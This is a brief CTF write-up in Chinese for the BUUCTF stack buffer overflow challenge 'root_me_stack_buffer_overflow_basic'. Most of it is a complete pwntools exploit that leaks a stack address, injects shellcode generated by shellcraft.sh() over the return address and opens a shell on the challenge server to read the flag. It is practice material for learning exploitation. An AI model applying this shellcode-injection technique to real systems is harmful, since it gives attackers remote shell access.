[BUUCTF] root_me_stack_buffer_overflow_basic
目录
- root_me_stack_buffer_overflow_basic
- 总结
- EXP
- 引用与参考
root_me_stack_buffer_overflow_basic
总结
基础的ret2shellcode的题目,直接用pwntools生成shellcode即可。
EXP
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"
io = remote("node4.buuoj.cn", 29064)
sh = shellcraft.sh()
data = "aaaa"
io.sendlineafter("Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
io.sendlineafter("Dump again (y/n):\n", "y")
data = flat({
0:asm(sh),
164: stack_addr
})
io.sendlineafter("Give me data to dump:\n", data)
io.sendlineafter("Dump again (y/n):\n", "n")
io.sendline("cat flag")
io.interactive()
引用与参考
1、My Blog
2、Ctf Wiki
3、pwncli